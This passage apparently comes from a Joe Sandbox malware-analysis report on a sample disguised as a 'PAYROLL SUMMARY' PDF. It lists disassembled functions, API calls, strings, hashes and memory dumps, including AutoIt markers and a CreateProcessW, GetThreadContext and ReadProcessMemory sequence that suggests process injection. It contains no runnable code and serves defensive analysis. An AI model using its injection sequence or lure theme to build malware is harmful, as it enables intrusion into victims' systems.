Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/.$EA06
API String ID: 4104443479-1743673582
Opcode ID: 407adfc03897347a7b3fe753de6c8c4143b1a3ff4f176d276e1b307e94b07f9a
Instruction ID: 3225dcc73824a5825242bc4dd689dcce7774b731994d0af299c918d33d106296
Opcode Fuzzy Hash: 407adfc03897347a7b3fe753de6c8c4143b1a3ff4f176d276e1b307e94b07f9a
Instruction Fuzzy Hash: F5418E32A341646BCF117F6488637BEFFA1AB0530AF584065EC429A182C5719DEC87E5

Function 002573E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028EE62
GetOpenFileNameW.COMDLG32(?), ref: 0028EEAC

Part of subcall function 002548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002548A1,?,?,002537C0,?), ref: 002548CE

Part of subcall function 002709D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002709F4

Strings

X, xrefs: 0028EE7A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: b8652a5bac7ba2cef65ea20dfa06d96e950352f6ae77d478926593983e976f6f
Instruction ID: ea413ef448030ab2ac5047d53e29b908c1de578a3c56b4248c9e8759c24fe9b1
Opcode Fuzzy Hash: b8652a5bac7ba2cef65ea20dfa06d96e950352f6ae77d478926593983e976f6f
Instruction Fuzzy Hash: 2221C6709212589BCF01DF94D8457EE7BFC9F49315F00801AE808E7281DBB4599D8F95

Function 002B901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002B9036
__fread_nolock.LIBCMT ref: 002B904B

Strings

EA06, xrefs: 002B907D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 3a72650d7ab04f31b265e0e1c1f2698c280570da539c86c5cd9a6c61a54c4cf8
Instruction ID: 44966f5a93b31538df0699578cc9ddabb7623e2e317fd5ffe4f44404974a1189
Opcode Fuzzy Hash: 3a72650d7ab04f31b265e0e1c1f2698c280570da539c86c5cd9a6c61a54c4cf8
Instruction Fuzzy Hash: 6201F971814218AFDB28CAA8C856FEEBBF89B01301F00859EF556D2181E5B5A6148B60

Function 002B9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 002B9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002B9B99

Strings

aut, xrefs: 002B9B93

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 091cce91700174d8981bc1202437de790333ae22e9a5ad3d427901987d5abfc7
Instruction ID: c5d6fe9f5f05749694257cc4b9086db73a3c5ac0788ac112ccf7112026ce0059
Opcode Fuzzy Hash: 091cce91700174d8981bc1202437de790333ae22e9a5ad3d427901987d5abfc7
Instruction Fuzzy Hash: C5D05E7994130DABDB509B90EC0EFEA772CE704700F0042A2BE55911A1DEB059988B95

Function 002CCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3d74bf4a41de24a59667f5b64fa21e10c87acd0f41d5bb4fa2ae9c5240276d
Instruction ID: 0d4af923a3515e87eeb9cfea6117e9a4bf226a15288ca19844aadc81567d05e7
Opcode Fuzzy Hash: 8d3d74bf4a41de24a59667f5b64fa21e10c87acd0f41d5bb4fa2ae9c5240276d
Instruction Fuzzy Hash: CCF13A719183019FCB14DF28C484A6ABBE5FF88314F14892EF89A9B352D771E955CF82

Function 002543DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00254401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 002544A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 002544C3

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: a061067e175f1cc662be32f2c53b814c63eeddedec7828d799810d9b33d56b68
Instruction ID: 55ffd512fb0ce0cc9af1824d641d252de2efaae2bd2254ab0169686dd62554c3
Opcode Fuzzy Hash: a061067e175f1cc662be32f2c53b814c63eeddedec7828d799810d9b33d56b68
Instruction Fuzzy Hash: FE3193705157018FD721EF64E88579BFBF8FB48309F00492EF99A83241D7B16998CB56

Function 0027594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00275963

Part of subcall function 0027A3AB: __NMSG_WRITE.LIBCMT ref: 0027A3D2
Part of subcall function 0027A3AB: __NMSG_WRITE.LIBCMT ref: 0027A3DC

__NMSG_WRITE.LIBCMT ref: 0027596A

Part of subcall function 0027A408: GetModuleFileNameW.KERNEL32(00000000,003143BA,00000104,?,00000001,00000000), ref: 0027A49A
Part of subcall function 0027A408: ___crtMessageBoxW.LIBCMT ref: 0027A548

Part of subcall function 002732DF: ___crtCorExitProcess.LIBCMT ref: 002732E5
Part of subcall function 002732DF: ExitProcess.KERNEL32 ref: 002732EE

Part of subcall function 00278D68: __getptd_noexit.LIBCMT ref: 00278D68

RtlAllocateHeap.NTDLL(01930000,00000000,00000001,00000000,?,?,?,00271013,?), ref: 0027598F

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 6f00322d93364478a58aff3bb43c4007d0d3a468c45e8a7ccbbee956246edb3f
Instruction ID: 2a1d62d6b2ced265589ab8a772da79f80e47f2e2da2a0d7afd30a02a07098f9a
Opcode Fuzzy Hash: 6f00322d93364478a58aff3bb43c4007d0d3a468c45e8a7ccbbee956246edb3f
Instruction Fuzzy Hash: 7701D231371B26DEE6216B35EC42A6EB2888F41770F10C02AF60D9B1C1DEF09D218AA4

Function 002B9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002B97D2,?,?,?,?,?,00000004), ref: 002B9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002B9B5B
CloseHandle.KERNEL32(00000000,?,002B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B9B62

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 2790719ba6c59ba4e18e7ea8d3e19e69d6b7c76a02bdce0bf6f96d517e6fc632
Instruction ID: 340137ee2cd930f586de80fb6b105c700cadfbad85ab2cc7fa83cbbd274254ff
Opcode Fuzzy Hash: 2790719ba6c59ba4e18e7ea8d3e19e69d6b7c76a02bdce0bf6f96d517e6fc632
Instruction Fuzzy Hash: 07E08632581224B7D7611F54FC0DFCA7B18AB05765F114121FB15690E087B16A21979C

Function 0025AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0029002B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: b4d011c37d231c5bd88fdca4eab0fa22e5ed8d02de25cd88c94c3fde01ae6f23
Instruction ID: eb12c4fbca46d4f18f7c8e61f9400226579fee1cfab0a2a8e24647ef2d60b0d7
Opcode Fuzzy Hash: b4d011c37d231c5bd88fdca4eab0fa22e5ed8d02de25cd88c94c3fde01ae6f23
Instruction Fuzzy Hash: D9224970528201CFCB25DF14C495B6ABBF1BF48305F14895DE88A8B362D771EDA9CB86

Function 0025492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00254992

Part of subcall function 002735AC: __lock.LIBCMT ref: 002735B2
Part of subcall function 002735AC: DecodePointer.KERNEL32(00000001,?,002549A7,002A81BC), ref: 002735BE
Part of subcall function 002735AC: EncodePointer.KERNEL32(?,?,002549A7,002A81BC), ref: 002735C9

Part of subcall function 00254A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00254A73
Part of subcall function 00254A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00254A88

Part of subcall function 00253B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B7A
Part of subcall function 00253B4C: IsDebuggerPresent.KERNEL32 ref: 00253B8C
Part of subcall function 00253B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,003162F8,003162E0,?,?), ref: 00253BFD
Part of subcall function 00253B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00253C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002549D2

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: c5015905dd28e5d1733b1883e0e02573de0d627e8c3e5ee7cd070a7e87cb3d0e
Instruction ID: a420caf86db6d19fa99fa7e71e8ce09c2b464c81833378186b91ad9fcc82ffe5
Opcode Fuzzy Hash: c5015905dd28e5d1733b1883e0e02573de0d627e8c3e5ee7cd070a7e87cb3d0e
Instruction Fuzzy Hash: E41190719243119BC701EF69EC0694AFFF8EB99710F00891EF44583271DB709969CF9A

Function 00270FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0027594C: __FF_MSGBANNER.LIBCMT ref: 00275963
Part of subcall function 0027594C: __NMSG_WRITE.LIBCMT ref: 0027596A
Part of subcall function 0027594C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001,00000000,?,?,?,00271013,?), ref: 0027598F

std::exception::exception.LIBCMT ref: 0027102C
__CxxThrowException@8.LIBCMT ref: 00271041

Part of subcall function 002787DB: RaiseException.KERNEL32(?,?,?,0030BAF8,00000000,?,?,?,?,00271046,?,0030BAF8,?,00000001), ref: 00278830

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 40817dd6fc2d9f9fb1c96200231bffceee029053407b4c60fd4e178bda9f8cdc
Instruction ID: 52bb930d66b9873c829b0e242bc378a4121481168888fc17782b18302bc0763a
Opcode Fuzzy Hash: 40817dd6fc2d9f9fb1c96200231bffceee029053407b4c60fd4e178bda9f8cdc
Instruction Fuzzy Hash: 19F02D3456025DE6CB20BE59DC059DFB7AC9F00350F508015FD0DA5581EFF08AB496E0

Function 0027582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027585C
__lock_file.LIBCMT ref: 0027587D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: fe6717009c5a1397361f3c4b7a1d81c6c2815dedd98e4baa7af39a486693c794
Instruction ID: c524f8a35d43c2369b64021d9618551105b082ca9770fbb9edd537b28eb0873f
Opcode Fuzzy Hash: fe6717009c5a1397361f3c4b7a1d81c6c2815dedd98e4baa7af39a486693c794
Instruction Fuzzy Hash: DE01AC71C50616EBCF12AFA58C0599FBB61BF40360F14C215F81C5B1A1DB718671DF92

Function 002755D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00278D68: __getptd_noexit.LIBCMT ref: 00278D68

__lock_file.LIBCMT ref: 0027561B

Part of subcall function 00276E4E: __lock.LIBCMT ref: 00276E71

__fclose_nolock.LIBCMT ref: 00275626

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: ae8fa6a6307733f08eeafc73725d9b03d190923cb4f6d30ad62c4f1676914f4f
Instruction ID: 4ed15289dfd12e7c4254b930dd7113c1e13fcda5506205ccd505ba02e17c81e7
Opcode Fuzzy Hash: ae8fa6a6307733f08eeafc73725d9b03d190923cb4f6d30ad62c4f1676914f4f
Instruction Fuzzy Hash: 13F0F031920A259AD720AF34880AB6EB6A46F01334F54C209E41CAB0C1CFFC8A218F51

Function 03DC129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03DC1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DC1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DC1B13

Memory Dump Source

Source File: 00000000.00000002.2150148278.0000000003DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3dc0000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 0ee563f6c2de3840bc98ac10f8952f26ab521dbfa5032101e9257dc33ca57e35
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 8112BE24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A

Function 002900D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 002900E1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 87a9e634221024ea84750492796837a6da429ac5bd2235b50ea9a90437a45bb3
Instruction ID: 8d4117bbdd20794febf6d7babd98c769ed9ec305b25c6bd3b807c3850691d26e
Opcode Fuzzy Hash: 87a9e634221024ea84750492796837a6da429ac5bd2235b50ea9a90437a45bb3
Instruction Fuzzy Hash: 8E411574528351CFDB25DF14C485B1ABBE0BF45319F1989ACE8894B362C332E8A9CF56

Function 00254F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00254D13: FreeLibrary.KERNEL32(00000000,?), ref: 00254D4D

Part of subcall function 0027548B: __wfsopen.LIBCMT ref: 00275496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,003162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254F6F

Part of subcall function 00254CC8: FreeLibrary.KERNEL32(00000000), ref: 00254D02

Part of subcall function 00254DD0: _memmove.LIBCMT ref: 00254E1A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: a7d976f9c95e0aa3b529a4f8e0d0a3823e6af3538592913065f077eec0a89118
Instruction ID: f5fd3fc2a7cef319f582616119344fb997a7dc89616db25905bb7ee782f47124
Opcode Fuzzy Hash: a7d976f9c95e0aa3b529a4f8e0d0a3823e6af3538592913065f077eec0a89118
Instruction Fuzzy Hash: F5112732620205ABCB14FF74CC12BAEB3A49F44706F10842AFD42A61D1DA719E689F64

Function 002901AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 002901BB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 472faebafb05665f4bc7d7b36e7ab421b88ab7455ef40c28404d624be15ed872
Instruction ID: 4bf0e12d3bc36d265582c368a840bdeff6dbf1061b5aaaae084f5a535922cc43
Opcode Fuzzy Hash: 472faebafb05665f4bc7d7b36e7ab421b88ab7455ef40c28404d624be15ed872
Instruction Fuzzy Hash: B8212474528351CFCB14DF54C486B1ABBE0BF88304F048968E98A57721D731E869CF56

Function 00257F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00257F82

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
Instruction ID: 781271300f360876136aad31d86517d4ee9314b8e87709f6c251a8dab2e38a6e
Opcode Fuzzy Hash: 81493697be757b975a0c6ed5652a7c4d93deff9418cd33d5771e7bc70a58f4b3
Instruction Fuzzy Hash: 35012672264301AED3209F28DC02F63BB94AB447A0F10852AF91ACA591EA71E4248B54

Function 00274A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00274AD6

Part of subcall function 00278D68: __getptd_noexit.LIBCMT ref: 00278D68

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __getptd_noexit__lock_file
